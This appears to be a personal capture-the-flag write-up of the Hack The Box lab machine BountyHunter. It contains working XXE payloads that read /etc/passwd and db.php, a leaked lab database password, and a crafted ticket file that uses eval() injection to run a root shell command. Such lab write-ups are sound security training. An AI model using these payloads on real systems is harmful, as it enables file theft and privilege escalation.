Bountyhunter
Hack The Box - BountyHunter
This is my Writeup and walkthrough for BountyHunter machine from Hack The Box.
Enumeration
1-Nmap
nmap -sC -sV -Pn 10.10.11.100
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-16 22:13 EET
Nmap scan report for 10.10.11.100
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
| 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
User access
2- HTTP service
hh don’t worry i will use burp😂😂
okey my methodology to know what is this product do
and i got that this platform for bug bounty okay let’s brute force directories to see what is important so i usually use dirsearch
for Quick bruteforce
lets check /resources/
directory
by checking bountylog.js
it seems a juicy file
now lets analyze this piece of code:
we notic the data is sent to server in data
parameter in xml format so it seems xml injection
so lets visit tracker_diRbPr00f314.php
its include i think data that send to server lets open burpsuite
to check request
very good this include data about your submission like bug-bounty submission
dont forget this is bug-bounty platform 🧐🧐
we will add data
parameter to request and send xml injection to try to read /etc/passwd
file
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>kajskdajd</cwe>
<cvss>8787</cvss>
<reward>557575</reward>
</bugreport>
i sent this data in data
parameter but i didn’t get anything 🧐
okey no problem i made Bounty Report via log_submit.php
and it send request to tracker_diRbPr00f314.php
page but i found my submition trasnport in data
parameter its encoded (url&base64)
thats very good lets encode our xml code and try to inject again
another trick we can do to reverse source code of db.php
file by using “php://filter/convert.base64-encode/resource=db.php”
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>kajskdajd</cwe>
<cvss>8787</cvss>
<reward>557575</reward>
</bugreport>
after decoding this string
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
we got db user name and password actually i don’t know what should i do with this credential so i decided to take break and watch movie…..
SSH
is opened !! —»> lets try,i thought that this password may be for ssh
no another thing to do so lets list all users we got it from etc/passwd
file and login.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
acullay we can use tools like hydra
to bruteforce user but i make it manually HOW!!
we can check users that have password on machine or Take a look at the uncommon users of Linux, but i recommend it when in small scope why!! not to make firewall if there to detect you ,accully i dont like bruteforce it my last choice
(Note that An x character indicates that encrypted password is stored in /etc/shadow file like root:x:
)
notice development
user
3- SSH
ROOT access
first lets check what this user can do so i used sudo -l
command
this user can run this /opt/skytrain_inc/ticketValidator.py
file so lets see what this file do
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()
def evaluate(ticketFile):
#Evaluates a ticket to check for ireggularities.
code_line = None
for i,x in enumerate(ticketFile.readlines()):
if i == 0:
if not x.startswith("# Skytrain Inc"):
return False
continue
if i == 1:
if not x.startswith("## Ticket to "):
return False
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
continue
if x.startswith("__Ticket Code:__"):
code_line = i+1
continue
if code_line and i == code_line:
if not x.startswith("**"):
return False
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
if validationNumber > 100:
return True
else:
return False
return False
def main():
fileName = input("Please enter the path to the ticket file.\n")
ticket = load_file(fileName)
#DEBUG print(ticket)
result = evaluate(ticket)
if (result):
print("Valid ticket.")
else:
print("Invalid ticket.")
ticket.close
main()
Okey after analysis this file this file check about ticket is valid or not
important notes about this python code :
1-ticket file should have md
extention.
2- eval()–» way to excute malicious code but first we should pass filters.
on exploring this server i found folder that have sample of invalid tickets in /opt/skytrain_inc/
so i downloaded this code and created test.md file to check the valid format of ticket.
valid format steps
1-first line starts with # Skytrain Inc
.
2-second line starts with## Ticket to
.
3-third line starts with __Ticket Code:__
4-Line 29
it checks if the fourth line is in or not ,if the line exist should starts with **
and the script removes the **
so in the forth line we can excute code so upload sample of test.md
in valid format on the server and tried to run the code
and try to read /root/root.txt
# Skytrain Inc
## Ticket to
__Ticket Code:__
**180+ 30 == 210 and __import__('os').system('cat /root/root.txt')
Finally PWN!!